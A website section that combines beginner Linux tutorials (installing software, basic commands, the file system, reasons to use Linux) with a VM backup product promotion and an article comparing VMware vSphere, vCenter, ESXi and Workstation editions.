If you run 'ps' while a complex command that takes some time to complete is executing, you'll see that command in the list. Remember that you can use all the modifiers in this section with any combination of Linux commands - that's what makes it so powerful. You can take lots of simple commands and chain, pipe and redirect them in such a way that they do something complicated!
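While a command is running in the background, a few related shell commands come in handy. A hedged sketch, assuming the bash shell - the job number and PID shown are just examples:

$ grep "Bombadil" *.* >> results.txt &    # start the search in the background
[1] 14976
$ jobs                                    # list the background jobs in this shell
[1]+  Running    grep "Bombadil" *.* >> results.txt &
$ fg %1                                   # bring job 1 back to the foreground
$ bg %1                                   # or resume a stopped job in the background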

Our next article covers Linux File & Folder Permissions; alternatively, you can visit our Linux section for more Linux-related technical articles.

 



  • Hits: 50603

Installing Software On Linux

Installing software in Linux is very different from Windows for one very simple reason: most Linux programs come in 'source code' form. This allows you to modify any program (if you're a programmer) to suit your purposes! While this is incredibly powerful for a programmer, for most of us who are not, we just want to start using the program!

Most programs will come 'zipped' just like they do in Windows; in other words, they pack all the files together into one file and compress it to a more manageable size. Depending on the zipping program used, the method of unzipping may vary, however, each program will have step by step instructions on how to unpack it.

Most of the time the 'tar' program will be used to unpack a package, and unzipping the package is fairly straightforward. This is initiated by typing 'tar -zxvf file-to-unzip.tgz' where 'file-to-unzip.tgz' is the actual filename you wish to unzip. We will explain the four popular options we've used (zxvf), but you can read tar's man page if you are stuck or need more information.

As mentioned, the 'tar' program is used to unpack a package we've downloaded and would like to install. Because most packages use 'tar' to create one file for easy downloads, gzip (Linux's equivalent to the Winzip program) is used to compress the tar file (.gz), reducing the size and making it easier to transfer. This also explains the reason most files have extensions such as '.tgz' or '.tar.gz'.

To make life easy, instead of giving two commands to decompress (unzip) and unpack the package, we provide tar with the -z option to automatically unzip the package and then proceed with unpacking it (-x). Here are the options in greater detail:

-z : Unzip tar package before unpacking it.

-x : Extract/Unpack the package

-v : Verbosely list files processed

-f : use archive file (filename provided)

linux-introduction-installing-software-1

Because the list of files was long, we've cut the bottom part to make it fit in our small window.

Once you have unzipped the program, go into its directory and look for a file called INSTALL, most programs will come with this file. It contains detailed instructions on how to install it, including the necessary commands to be typed, depending on the Linux distribution you have. After you've got that out of the way, you're ready to use the three magic commands that install 99% of all software in Linux :)

Open the program directory and type ./configure. [1st magic command]

linux-introduction-installing-software-2

You'll see a whole lot of output that you may not understand; this is when the software you're installing is automatically checking your system to analyze the options that will work best. Unlike the Windows world, where programs are made to work on a very general computer, Linux programs automatically customize themselves to fit your system.

Think of it as the difference between buying ready-made clothes and having tailor made clothes especially designed for you. This is one of the most important reasons why programs are in the 'source code' form in Linux.

In some cases, the ./configure command will not succeed and will produce errors that will not allow you to take the next step and compile your program. In these cases, you must read the errors, fix any missing library files (the most common cause) or other problems and try again:

linux-introduction-installing-software-3

As you can see, we've run into a few problems while trying to configure this program on our lab machine, so we looked for a different program that would work for the purpose of this demonstration!

linux-introduction-installing-software-4

 

This ./configure finished without any errors, so the next step is to type make. [2nd magic command]

linux-introduction-installing-software-5

This simple command will magically convert the source code into a usable program... the best analogy for this process is that the source code contains all the ingredients of a recipe; if you understand programming, you can change the ingredients to make the dish better. Typing the make command takes the ingredients and cooks the whole meal for you! This process is known as 'compiling' the program.

If make finishes successfully, you will want to put all the files into the right directories, for example, all the help files in the help files directory, all the configuration files in the /etc directory (covered in the pages that follow).

To perform this step, you have to be logged in as the superuser or 'root' account; if you don't know this password, you can't do this.

Assuming you are logged in as root, type make install. [3rd magic command]

linux-introduction-installing-software-6

Lastly, once our program has been configured, compiled and installed in /usr/local/bin with the name of 'bwn-ng', we are left with a whole bunch of extra files that are no longer useful. These can be cleaned up using the make clean command - but this, as you might have guessed, is not considered a magic command :)

linux-introduction-installing-software-7

 There, that's it!
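To recap, here is the whole sequence in one place - a minimal sketch, assuming a hypothetical package called program-1.0.tgz that follows the usual configure/make convention:

$ tar -zxvf program-1.0.tgz     # unzip and unpack the source code
$ cd program-1.0                # enter the newly created directory
$ ./configure                   # 1st magic command: check the system and prepare the build
$ make                          # 2nd magic command: compile the source code
$ su                            # switch to the root account (you'll be asked for the root password)
# make install                  # 3rd magic command: copy the files to their proper directories (the '#' prompt shows you are now root)
# make clean                    # optional: remove the leftover build files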

Now here's the good news... that was the old hard way!

All the people involved with Linux realised that most people don't need to read the source code and change the program, and don't want to compile programs, so there is now another way of distributing programs in what is known as 'rpm' (Red Hat Package Manager) format.

This is one single file containing a pre-compiled program; you just have to double-click the rpm file (in the Linux graphical interface - X) and it will be installed on your system for you!

In the event that you find a program that is not compiling with 'make' you can search on the net (we recommend www.pbone.net ) for an rpm based on your Linux distribution and version. Installation then is simply one click away for the graphical X desktop, or one command away for the hardcore Linux enthusiasts!

Because the 'rpm' utility is quite complex with a lot of flags and options, we would highly recommend you read its 'man' page before attempting to use it to install a program.

One last note about rpm is that it will also check to see if there are any dependent programs or files that should or shouldn't be touched during an install or uninstall. By doing so, it effectively protects your operating system from accidentally overwriting or deleting a critical system file, which could cause a lot of problems later on!
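For the command-line route, here are a couple of commonly used rpm invocations - the package name is hypothetical, and the rpm man page lists the full set of options:

$ rpm -ivh program-1.0.i386.rpm    # install a package with verbose output and a progress bar
$ rpm -Uvh program-1.1.i386.rpm    # upgrade an already installed package
$ rpm -qa | grep program           # query all installed packages and filter the list with grep
$ rpm -e program                   # erase (uninstall) the package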

For those looking for a challenge, our next article covers Advanced Linux Commands and explores commands most used in the administration of the Linux operating system. Alternatively, you can visit our Linux section to get access to a variety of Linux articles.

  • Hits: 24730

The Linux Command Line

Those who are already familiar with the topic could skip this whole section, but we highly recommend you read it because this is the heart of Linux. We also advise you to go through this section while sitting in front of the computer.

Most readers will be familiar with DOS in Windows and opening a DOS box. Well, let's put it this way.. comparing the power of the Linux command line with the power of the DOS prompt is like comparing a Ferrari with a bicycle!

People may tell you that the Linux command line is difficult and full of commands to remember, but it's the same thing in DOS - and just remember, you can get by in Linux without ever opening a command line (just like you can do all your work in Windows without ever opening a DOS box!). However, the Linux command line is actually very easy and logical, and once you have even the slightest ability and fluency with it, you'll be amazed at how much faster you can do complicated tasks than you would be able to with the fancy point-and-click graphics and mouse interface.

To give you an example, imagine the number of steps it would take you in Windows to find a file that has the word "hello" at the end of a line, open that file, remove the first ten lines, sort all the other lines alphabetically and then print it. In Linux, you could achieve this with a single command! - Have we got your attention yet ?!

Though you might wonder what you could achieve by doing this - the point is that you can do incredibly complicated things by putting together small commands, exactly like using small building blocks to make a big structure.

We'll show you a few basic commands to move around the command line as well as their equivalents in Windows. We will first show you the commands in their basic form and then show you how you can see all the options to make them work in different ways.

The Basic Commands

As a rule, note that anything typed in 'single quotes and italics' is a valid Linux command to be typed at the command line, followed by Enter.

We will use this rule throughout all our tutorials to avoid confusion and mistakes. Do not type the quotes and remember that, unlike Windows, Linux is case sensitive, thus typing 'Document' is different from typing 'document'.

•  ls - You must have used the 'dir' command on Windows... well this is like 'dir' command on steroids! If you type 'ls' and press enter you will see the files in that directory, there are many useful options to change the output. For example, 'ls -l' will display the files along with details such as permissions (who can access a file), the owner of the file(s), date & time of creation, etc. The 'ls' command is probably the one command you will use more than any other on Linux. In fact, on most Linux systems you can just type 'dir' and get away with it, but you will miss out on the powerful options of the 'ls' command.

linux-introduction-cmd-line-1

 

•  cd - This is the same as the DOS command: it changes the directory you are working in. Suppose you are in the '/var/cache' directory and want to go to its subfolder 'samba' , you can type 'cd samba' just as you would if it were a DOS system.

linux-introduction-cmd-line-2

Imagine you were at the '/var/cache' directory and you wanted to change to the '/etc/init.d' directory in one step, you could just type 'cd /etc/init.d' as shown above. On the other hand, if you just type 'cd' and press enter, it will automatically take you back to your personal home directory (this is very useful as all your files are usually stored there).

We also should point out that while Windows and DOS use the well known back-slash ' \ ' in the full path address, Linux differentiates by using the forward-slash ' / '. This explains why we use the command 'cd /etc/init.d' and not 'cd \etc\init.d' as most Windows users would expect.

•  pwd - This will show you the directory you are currently in, should you forget. It's almost like asking the operating system 'Where am I right now ?'. It will show you the 'present working directory'.

linux-introduction-cmd-line-3

 

•  cp - This is the equivalent of the Windows 'copy' command. You use it to copy a file from one place to another. So if you want to copy a file called 'document' to another file called 'document1' , you would need to type 'cp document document1'. In other words, first the source, then the destination.

linux-introduction-cmd-line-4

The 'cp' command will also allow you to provide the path to copy it to. For example, if you wanted to copy 'document' to the home directory of user1, you would then type 'cp document /home/user1/'. If you want to copy something to your home directory, you don't need to type the full path (example /home/yourusername), you can use the shortcut '~' (tilde), so to copy 'document' to your home directory, you can simply type 'cp document ~'.

 

•  rm - This is the same as the 'del' or 'delete' command in Windows. It will delete the files you specify. So if you need to delete a file named 'document', you type 'rm document'. On many distributions the system will ask if you are sure, so you get a second chance! If you type 'rm -f' then you will force (-f) the system to execute the command without requiring confirmation, which is useful when you have to delete a large number of files.

linux-introduction-cmd-line-5

In all Linux commands you can use the '*' wildcard that you use in Windows, so to delete all files ending with .txt in Windows you would type 'del *.txt' whereas in Linux you would type 'rm -f *.txt'. Remember, we used the '-f' flag because we don't want to be asked to confirm the deletion of each file.

linux-introduction-cmd-line-6

To delete a folder, you have to give rm the '-r' (recursive) option; as you might have already guessed, you can combine options like this: 'rm -rf mydirectory'. This will delete the directory 'mydirectory' (and any subdirectories within it) and will not ask you twice. Combining options like this works for all Linux commands.

 

•mkdir / rmdir - These two commands are the equivalent of Windows' 'md' and 'rd', which allow you to create (md) or remove (rd) a directory. So if you type 'mkdir firewall', a directory will be created named 'firewall'. On the other hand, type 'rmdir firewall' and the newly created directory will be deleted. We should also note that the 'rmdir' command will only remove an empty directory, so you might be better off using 'rm -rf' as described above.

linux-introduction-cmd-line-7

 

•mv - This is the same as the 'move' command on Windows. It works like the 'cp' or copy command, except that after the file is copied, the original source file is deleted. By the way, there is no separate rename command needed on Linux because technically moving and renaming a file is the same thing!

In this example, we recreated the 'firewall' directory we deleted previously and then tried renaming it to 'firewall-cx'. Lastly, the new directory was moved to the '/var' directory:

linux-introduction-cmd-line-8

That should be enough to let you move around the command line or the 'shell', as it's known in the Linux community. You'll be pleased to know that there are many ways to open a shell window from the ‘X' graphical desktop, which can be called an xterm, or a terminal window.

•  cat / more / less - These commands are used to view files containing text or code. Each command will allow you to perform a special function that is not available with the others so, depending on your work, some might be used more frequently than others.

The 'cat' command will show you the contents of any file you select. This command is usually used in conjunction with other advanced commands such as 'grep' to look for a specific string inside a large file which we'll be looking at later on.

When issued, the 'cat' command will run through the file without pausing until it reaches the end, just like a file scanner that examines the contents of a file while at the same time showing the output on your screen:

linux-introduction-cmd-line-9

In this example, we have a whopping 215KB text file containing the system's messages. We issued the 'cat messages' command and the file's contents were immediately listed on our screen - this went on for a minute until the 'cat' command reached the end of the file and exited.

Not much use for this example, but keep in mind that we usually pipe the output to other commands in order to give us some usable results :)

'more' is used in a similar way, but will pause the screen when it has filled with text, in which case we need to hit the space bar or enter key to continue scrolling per page or line. The 'up' or 'down' arrow keys are of no use for this command and will not allow you to scroll through the file - it's pretty much a one way scrolling direction (from the beginning to the end) with the choice of scrolling per page (space bar) or line (enter key).

The 'less' command is an enhanced version of 'more', and certainly more useful. With the less command, you are able to scroll up or down a file's content. To scroll down per page, you can make use of the space bar, or CTRL-D. To scroll upwards towards the beginning of the file, use CTRL-U.

It is not possible for us to cover all the commands and their options because there are thousands! However, we will teach you the secret to using Linux -- that is, how to find the right tool (command) for a job, and how to find help on how to use it.

Can I Have Some Help Please?

To find help on a command, you type the command name followed by '--help'. For example, to get help on the 'mkdir' command, you will type 'mkdir --help'. But there is a much more powerful way...

For those who read our previous section, remember we told you that Linux stores all files according to their function? Well Linux stores the manuals (help files) for every program installed, and the best part is that you can look up the 'man pages' (manuals) very easily. All the manuals are in the same format and show you every possible option for a command.

To open the manual of a particular command, type 'man' followed by the command name, so to open the manual for 'mkdir' type 'man mkdir':

linux-introduction-cmd-line-10

Interestingly, try getting help on the 'man' command itself by typing 'man man'. This is the most authoritative and comprehensive source of help for anything you have in Linux, and the best part is that every program will come with its manual! Isn't this so much better than trying to find a help file or readme.txt file :) ?

Here's another incredibly useful command -- if you know the task you want to perform, but don't know the command or program to use, use the 'apropos' command. This command will list all the programs on the system that are related to the task you want to perform. For example, say you want to send email but don't know the email program, you can type 'apropos email' and receive a list of all the commands and programs on the system that will handle email! There is no equivalent of this on Windows.

Searching for Files in Linux?

Another basic function of any operating system is knowing how to find or search for a missing or forgotten file, and if you have already asked yourself this question, you'll be pleased to find out the answer :)

The simplest way to find any file in Linux is to type 'locate' followed by the filename. So if you want to find a file called 'document' , you type 'locate document'. The locate command works using a database that is usually built when you are not using your Linux system, indexing all your files and directories to help you locate them.

You can use the more powerful 'find' command, but I would suggest you look at its 'man' page first by typing 'man find'. The 'find' command differs from the 'locate' command in that it does not use a database, but actually looks for the file(s) requested by scanning the whole directory or file system depending on where you execute the command.

Logically, the 'locate' command is much faster when looking for a file that has already been indexed in its database, but will fail to discover any new files that have just been installed since they haven't been indexed! This is where the 'find' command comes to the rescue!
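A short sketch contrasting the two commands - the file names are hypothetical, and updatedb (which rebuilds locate's index) normally needs to be run as root:

$ locate document                       # fast lookup in the pre-built index
$ updatedb                              # rebuild the index so newly created files can be found
$ find / -name document 2>/dev/null     # scan the whole file system, discarding 'permission denied' errors
$ find . -name "*.txt"                  # search only the current directory and below for .txt files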

Our next article covers  Installing Software on Linux, alternatively you can head back to our Linux Section.

 

  • Hits: 35235

The Linux File System

A file system is nothing more than the way the computer stores and retrieves all your files. These files include your documents, programs, help files, games, music etc. In the Windows world we have the concept of files and folders.

A folder (also known as a directory) is nothing more than a container for different files so that you can organise them better. In Linux, the same concept holds true -- you have files, and you have folders in which you organise these files.

The difference is that Windows stores files in folders according to the program they belong to (in most cases), in other words, if you install a program in Windows, all associated files -- such as the .exe file that you run, the help files, configuration files, data files etc. go into the same folder. So if you install for example Winzip, all the files relating to it will go into one folder, usually c:\Program Files\Winzip.

In Linux however, files are stored based on the function they perform. In other words, all help files for all programs will go into one folder made just for help files, all the executable (.exe) files will go into one folder for executable programs, and all programs' configuration files will go into a folder meant for configuration files.

This layout has a few significant advantages as you always know where to look for a particular file. For example, if you want to find the configuration file for a program, you're bound to find it in the directory reserved for configuration files (/etc, as we'll see shortly).

With the Windows operating system, it's highly likely the configuration file will be placed in the installation directory or some other Windows system subfolder. In addition, registry entries are something you won't be able to keep track of without the aid of a registry tracking program - something that does not exist in the Linux world since there is no registry!

Of course in Linux everything is configurable to the smallest level, so if you choose to install a program and store all its files in one folder, you can, but you will just complicate your own life and miss out on the benefits of a file system that groups files by the function they perform rather than arbitrarily.

Linux uses a hierarchical file system; in other words, there is no concept of 'drives' like c: or d:. Everything starts from what is called the '/' directory (known as the root directory). This is the top most level of the file system and all folders are placed at some level from here. This is how it looks:

linux-introduction-file-system-1

Because files are stored according to their function, you will see many of the same folders on any Linux system.

These are 'standard' folders that have been pre-designated for a particular purpose. For example the 'bin' directory will store all executable programs (the equivalent of Windows ‘.exe ' files).

Remember also that in Windows you access directories using a backslash (eg c:\Program Files) whereas in Linux you use a forward slash (eg: /bin ).

In other words you are telling the system where the directory is in relation to the root or top level folder.

So to access the cdrom directory according to the diagram on the left you would use the path /mnt/cdrom.

To access the home directory of user 'sahir' you would use /home/sahir.

 

 

 

 

So it's now time to read a bit about each directory function to help us get a better understanding of the operating system:

• bin - This directory is used to store the system's executable files. Most users are able to access this directory as it does not usually contain system critical files.

• etc - This folder stores the configuration files for the majority of services and programs run on the machine. These configuration files are all plain text files that you can open and edit to change a program's configuration instantly. Network services such as samba (Windows networking), dhcp, http (apache web server) and many more rely on this directory! You should be careful with any changes you make here.

• home - This is the directory in which every user on the system has his own personal folder for his own personal files. Think of it as similar to the 'My Documents' folder in Windows. We've created one user on our test system by the name of 'sahir' - When Sahir logs into the system, he'll have full access to his home directory.

• var - This directory is for any file whose contents change regularly, such as system log files - these are stored in /var/log. Temporary files that are created are stored in the directory /var/tmp.

• usr - This is used to store any files that are common to all users on the system. For example, if you have a collection of programs you want all users to access, you can put them in the directory /usr/bin. If you have a lot of wallpapers you want to share, they can go in /usr/wallpaper. You can create directories as you like.

• root - This can be confusing as we have a top level directory ‘/' which is also called ‘the root folder'.

The 'root' (/root) directory is like the 'My Documents' folder for a very special user on the system - the system's Administrator, equivalent to Windows 'Administrator' user account.

This account has access to any file on the system and can change any setting freely. Thus it is a very powerful account and should be used carefully. As a good practice, even if you are the system Administrator, you should not log in using the root account unless you have to make some configuration changes.

It is a better idea to create a 'normal' user account for your day-to-day tasks since the 'root' account is the account for which hackers always try to get the password on Linux systems because it gives them unlimited powers on the system. You can tell if you are logged in as the root account because your command prompt will have a hash '#' symbol in front, while other users normally have a dollar '$' symbol.

• mnt - We already told you that there are no concepts of 'drives' in Linux. So where do your other hard-disks (if you have any) as well as floppy and cdrom drives show up?

Well, they have to be 'mounted' or loaded for the system to see them. This directory is a good place to store all the 'mounted' devices. Taking a quick look at our diagram above, you can see we have mounted a cdrom device so it is showing in the /mnt directory. You can access the files on the cdrom by just going to this directory! (A short sketch of mounting a device follows this list.)

• dev - Every system has its devices, and the Linux O/S is no exception to this! All your system's devices such as com ports, parallel ports and other devices exist in the /dev directory as files and directories! You'll hardly be required to deal with this directory, however you should be aware of what it contains.

• proc - Think of the /proc directory as a deluxe version of the Windows Task Manager. The /proc directory holds all the information about your system's processes and resources. Here again, everything exists as a file and directory, something that shouldn't surprise you by now!

By examining the appropriate files, you can see how much memory is being used, how many tcp/ip sessions are active on your system, get information about your CPU usage and much more. All programs displaying information about your system use this directory as their source of information!

• sbin - The /sbin directory's role is similar to that of the /bin directory we covered earlier, with the difference that it's only accessible by the 'root' user. The reason for this restriction, as you might have already guessed, is the sensitive applications it holds, which are generally used for the system's configuration and various other important services. Consider it the equivalent of the Windows Administrative Tools folder and you'll get the idea.
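To illustrate the 'mnt' and 'proc' entries above, here is a small hedged sketch - the device name and mount point are typical examples and may differ on your system:

$ mount /dev/cdrom /mnt/cdrom    # make the CD-ROM's files visible under /mnt/cdrom (usually needs root)
$ ls /mnt/cdrom                  # browse the CD's contents like any other directory
$ umount /mnt/cdrom              # detach it again when you're done
$ cat /proc/cpuinfo              # information about your CPU
$ cat /proc/meminfo              # current memory usage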

Lastly, if you've used a Linux system, you'll have noticed that not many files have an extension - that is, the three letters after the dot, as found in Windows and DOS: file1.txt , winword.exe , letter.doc.

While you can name your files with extensions, Linux doesn't really care about the 'type' of file. There are very quick ways to instantly check what type of file anything is, and you can even make just about any file in Linux executable (the equivalent of an .exe file) on a whim!

Linux is smart enough to recognise the purpose of a file so you don't need to remember the meaning of different extensions.

You have now covered the biggest hurdle faced by new Linux users. Once you get used to the file system you'll find it is a very well organised system that makes storing files a very logical process. There is a system and, as long as you follow it, you'll find most of your tasks are much simpler than in other operating systems. Our next article, The Linux Command Line, explores the Linux command line, commands, options and much more. Alternatively, you can head back to our Linux section to find more technical articles covering the Linux operating system.

  • Hits: 37939

Why Use Linux?

The first question is - what are the benefits of using Linux instead of Windows? This is in fact a constant debate between the Windows and Linux communities and while we won't be taking either side, you'll discover that our points will favour the Linux operating system because they are valid :)

Of course, if you don't agree, our forums have a dedicated Linux section where we would happily discuss it with you!

Reasons for using Linux ....

While we could list a billion technical reasons, we will focus on those that we believe will affect you most:

•Linux is free. That's right - if you never knew it, the Linux operating system is free of charge. No user or server licenses are required*! If, however, you walk into an IT shop or bookstore, you will find various Linux distributions on the shelf available for purchase; that cost is purely to cover the packaging and the support that may come with the distribution.

* We must note that the newer 'Advanced Linux Servers', now available from companies such as Redhat, actually charge a license fee because of the support and update services they provide for the operating system. In our opinion, these services are rightly charged since they are aimed at businesses that will use their operating system in critical environments where downtime and immediate support is non-negotiable.

•Linux is developed by hundreds of thousands of people worldwide. Because of this community development mode there are very fresh ideas going into the operating system and many more people to find glitches and bugs in the software than any commercial company could ever afford (yes, Microsoft included).

•Linux is rock solid and stable, unlike Windows, where just after you've typed a huge document it suddenly crashes, making you lose all your work!

Runtime errors and crashes are quite rare on the Linux operating system due to the way its kernel is designed and the way processes are allowed to access it. No one can guarantee that your Linux desktop or server will not crash at all, because that would be a bit extreme, however, we can say that it happens a lot less frequently in comparison with other operating systems such as Windows.

For the fanatics of the 'blue screen of death' - you'll be disappointed to find out there is no such thing in the world of Linux. However, not all is lost as there have been some really good 'blue screen of death' screen savers out for the Linux graphical X Windows system.

You could also say that evidence of the operating system's stability is the fact that it's the most widely used operating system for running important services in public or private sectors. Worldwide statistics show that the number of Linux web servers outweigh by far all other competitors:

linux-introduction-why-use-linux-1

Today, netcraft reports that for the month of June 2005, out of a total of 64,808,485 Web servers, 45,172,895 are powered by Apache while only 13,131,043 use Microsoft's IIS Web server!

•Linux is much more secure than Windows. There are almost no viruses for Linux and, because there are so many people working on Linux, whenever a bug is found a fix is provided much more quickly than with Windows. Linux is also much more difficult for hackers to break into as it has been designed from the ground up with security in mind.

•Linux uses fewer system resources than Windows. You don't need the latest, fastest computer to run Linux. In fact you can run a functional version of Linux from a floppy disk with a computer that is 5-6 years old! At this point, we can also mention that one of our lab firewalls still runs on a K6-266 -3DNow! processor with 512 MB RAM! Of course - no graphical interfaces are loaded as we only work in CLI mode!

•Linux has been designed to put power into the hands of the user so that you have total control of the operating system and not the other way around. A person who knows how to use Linux has the computer far more 'by the horns' than any Windows user ever has.

•Linux is highly compatible with other systems. Unlike Microsoft Windows, which is at its happiest when talking to other Microsoft products, Linux is not 'owned' by any company and thus it maintains its compatibility with other systems. The simplest example of this is that a Windows computer cannot natively read files from a hard disk formatted with a Linux file system (ext2 & ext3), but Linux will happily read files from a hard disk formatted with a Windows file system (FAT, FAT32 or NTFS), or, for that matter, from most other operating systems' file systems (see the quick example below).
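As a quick, hands-on illustration of this interoperability, here is a minimal sketch of reading a Windows NTFS partition from a Linux shell. The device name /dev/sdb1 and the mount point are assumptions made for this example (your partition name will differ), and the ntfs-3g driver is assumed to be installed:

# identify the Windows partition (in this example it appears as /dev/sdb1)
lsblk -f

# create a mount point and mount the NTFS partition read-only
mkdir -p /mnt/windows
mount -t ntfs-3g -o ro /dev/sdb1 /mnt/windows

# browse the Windows files
ls /mnt/windows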

Now that we've covered some of the benefits of using Linux, let's start actually focusing on the best way to ease your migration from the Microsoft world to the Linux world, or in case you already have a Linux server running - start unleashing its full potential!

The first thing we will go over is the way Linux deals with files and folders on the hard-disk as this is completely different to the way things are done in Windows and is usually one of the challenges faced by Linux newbies.

 




8 Critical Features to Have in a VM Backup Solution

vm backup key features

Businesses that rely on virtual machines for their day-to-day operations should think seriously about securing their infrastructure. Modern use of virtual machines stems from the benefits of virtualization, which include accessibility, reduced operating costs, and flexibility, among others. But those benefits mean little without proper protection of your virtual infrastructure. One way to achieve that is through virtual machine backup and recovery solutions.

VM backups are crucial for maintaining business continuity. They help businesses prevent data loss and offer a failsafe if something happens to your Hyper-V or VMware virtual infrastructure. These services aren't uncommon. But knowing which one to choose depends on several factors. None are more important than the product's features, which directly impact your ability to keep the infrastructure running.

So that raises the question: what are the essential features of VM backup software? That's exactly what this short guide focuses on. So, let's dive in.


Download your free copy of the latest V9 VM Backup now.

Ransomware Protection

Ransomware attacks are making the rounds, and cybersecurity blogs and experts talk extensively about the potential damage these attacks can do. A ransomware attack can render your data inaccessible, locking it and demanding a ransom for its release. Therefore, it becomes a necessity to protect against potential ransomware attacks. Luckily, ransomware protection is a core feature of the V9 VM backup.

The feature is designed to prevent malicious software from tampering with the data on your virtual machines. Moreover, the ransomware data protection feature prevents any user, even one with admin or root access, from modifying or deleting the backup data on your backup server. With this level of protection against devastating malware, businesses add another layer of security to their virtual environment.

Storage Saving With Augmented Inline Deduplication Technology

Storage costs are a significant concern for businesses, and choosing a VM backup provider that offers massive storage-saving features is essential. Few storage-saving features are as comprehensive as the Augmented Inline Deduplication Technology with the V9 VM Backup. The feature works by eliminating redundant data, resulting in significant storage savings.

This technology uses machine learning to identify the changed data from the previous backup, thus backing up only the changed data to the customers' backup server or repository. In comparison, most VM backup and restore services approach the backup process differently, removing identical data after the transfer to the backup repository.

The net result is a significant reduction in the storage footprint of your backups.

Cloud Backup

Continue reading


Differences Between VMware vSphere, vCenter, ESXi Free vs ESXi Paid, Workstation Player & Pro

vmware esxi vsphere vcenter intro

In this article we will cover the differences between VMware ESXi, vSphere and vCenter, while also explaining the features supported by each vSphere edition: vSphere Standard, Enterprise Plus and Platinum. We will touch on the differences and limitations between VMware Workstation Player and VMware Workstation Pro, and also compare them with the ESXi Free and ESXi Paid editions.

Finally we will demystify the role of vCenter and the additional features it provides to a VMware infrastructure.


Visit our Virtualization and Backup section for more high-quality technical articles.

vmware vsphere

Concerned about your VM machines and data? Download now your Free Enterprise-grade VM Backup solution


Difference Between VMware vSphere & vCenter

It’s sometimes difficult to keep up to date with the latest names of software. Even the largest technology vendors change their product names from time to time. Unfortunately, getting the product name wrong can result in various costly consequences, including purchasing the wrong product or an older version with a different feature set.

Contrary to popular belief, vSphere and vCenter are actually different products:

  • vSphere is VMware’s name for a suite of Infrastructure products. You can think of it as a platform name which includes lots of different components.
  • vCenter is the name of one of the components under the vSphere suite. vCenter runs as a dedicated VM (historically on Windows Server, nowadays as a Linux-based appliance) and provides the management and control plane of the entire VMware environment. This is also shown in the diagram below:

differences between vsphere and vcenter

Looking at the vSphere suite, the components and features that vSphere includes depend on your licenses. vCenter Server is available on all vSphere editions.

Here is an overview of some features for the main vSphere editions:

vmware vsphere editions feature comparison

You will notice that this vSphere feature table contains many different technologies which are found in different VMware software components.

vCenter is a management tool that helps manage multiple ESXi / vSphere hypervisors within the datacentre. Earlier versions of vCenter (also known as vCenter Server) ran exclusively on Windows Server (shown in the previous diagram), whereas VMware now offers the vCenter Server Appliance (vCSA), which runs on either SUSE Linux Enterprise Server 64-bit (vCSA v6.0) or VMware’s proprietary Photon OS (vCSA v6.5 and above).

You log in to vCenter Server via an HTML5 browser client (formerly a Flash client) which looks like this:

vmware vsphere login

From here, we can manage all vSphere related components (and their corresponding features) which include:

  • vCenter Server (vCSA)
  • vSphere Hypervisors (ESXi Servers)
  • vSphere Update Manager
  • vSphere Replication

So, in summary, the difference between vSphere and vCenter is that vSphere consists of a suite of VMware components with vCenter Server being one of those.

vCenter Server is the management software or if you prefer, tool, to help manage your vSphere Components and all their features.

You can use some vSphere components without a vCenter Server but some features will not be available.

What is VMware ESXi?

ESXi is a Type-1 hypervisor, which means it’s a piece of software that runs directly on a bare-metal server without requiring a host operating system. As a hypervisor, ESXi manages access to all physical resources such as CPUs, memory, network interface cards, storage (HDDs, SSDs etc) and more.

ESXi’s vmkernel sits between the virtual machines and physical hardware and from there it shares the available hardware including CPUs, storage (HDDs, SSDs etc), memory and network interfaces of the physical host amongst the multiple virtual machines. Applications running in virtual machines can access these resources without direct access to the underlying hardware.

The VMkernel is the core software responsible for receiving resource requests from virtual machines and presenting those requests to the physical hardware.

There are stricter compatibility requirements for ESXi installations as hardware drivers need to be certified. However, once ESXi is installed and operational, you get access to enterprise-grade virtual machine features.

vmware esxi server web guiVMware ESXi GUI Interface - Click to enlarge

VMware ESXi comes in a variety of flavours. A free version exists if you simply need to deploy basic Virtual Machines with no High Availability or central management requirements. This is best suited for trialling software and labs which are not in production.

For mission-critical applications, you should consider the paid version of ESXi, which comes with VMware support and features geared toward professional environments. Adding VMware’s vCenter Server enables central management of all your ESXi servers and takes your datacentre one step further with features such as:

  • Clustering
  • High Availability
  • Fault Tolerance
  • Distributed Resource Scheduler
  • Virtual Machine Encryption

Difference Between VMware ESXi Free & ESXi Paid Version

The VMware ESXi free vs ESXi paid debate comes up a lot, but fortunately, it is easily answered.

The question to ask yourself is whether you plan to run mission-critical applications on top of ESXi. By mission-critical we mean applications that your business depends on. If the answer is yes, then you will require the paid version of ESXi with support so that you can contact VMware should anything go wrong.

Even if the answer is no, you might still consider a paid version of ESXi if you need the management functions of vCenter Server. Such use cases might be large development companies who don’t consider their test and development environments mission-critical but they do want a way to manage hundreds or thousands of Virtual Machines.

VMware ESXi free is still feature-rich though. For a small environment where your business won’t grind to a halt if an ESXi server goes offline, it might therefore be cost-effective, even with the additional manual management tasks involved. Keep in mind though that backup APIs are not available in the free version, meaning that native, host-level backup of your VMs won’t be possible. You can work around this by installing and managing backup agents within your guest operating systems. This is one example of management overhead that you wouldn’t have with a paid version.

When Do You Need vCenter?

It’s worth keeping in mind that even with a paid version of ESXi, you will still need a vCenter Server license to use any clustering features. A paid version of ESXi does offer some benefits (such as VADP backup abilities) but without a vCenter Server license, most of the benefits are not available.

Almost all customers of paid ESXi licenses will also purchase a vCenter Server license so that those licensed ESXi servers can be centrally managed. Once all ESXi servers are managed by vCenter Server, you unlock all the ESXi features that you are licensed for.

So when do you need a vCenter Server? The answer is simple: to unlock features such as Clustering, High Availability (automatic restart of VMs from a failed host onto a healthy host), Cloning and Fault Tolerance. If you are looking to add other VMware solutions to the datacentre, including vSAN, vSphere Replication or Site Recovery Manager, then all of those solutions require access to a vCenter Server.

In summary, if you find that you need the paid ESXi version then you are most likely also going to need a vCenter Server license too. Fortunately, VMware provides Essentials and Essentials Plus bundles with a 3-host (physical server) limit; these bundles include ESXi and a vCenter Server license at a discounted rate to keep initial costs down.

Just by looking at the vSphere Client you can see the various vCenter-related options, which show the value added by bolting vCenter onto your datacentre management stack:

vmware vsphere client
VMware vsphere client - Click to enlarge

VMware Workstation Player vs VMware Workstation Pro

VMware Workstation Player is free software that lets you run a Virtual Machine on top of your own Windows PC’s operating system. There are two editions of VMware Workstation: Workstation Player and Workstation Pro.

The key differences between these two editions are that with VMware Workstation Player you can only run one Virtual Machine on your computer at a time and enterprise features are disabled. VMware Workstation Pro, on the other hand, supports running multiple virtual machines at the same time, plus a few more neat features mentioned below.

Here is what Workstation Pro looks like - notice how you can have many virtual machines running at once:

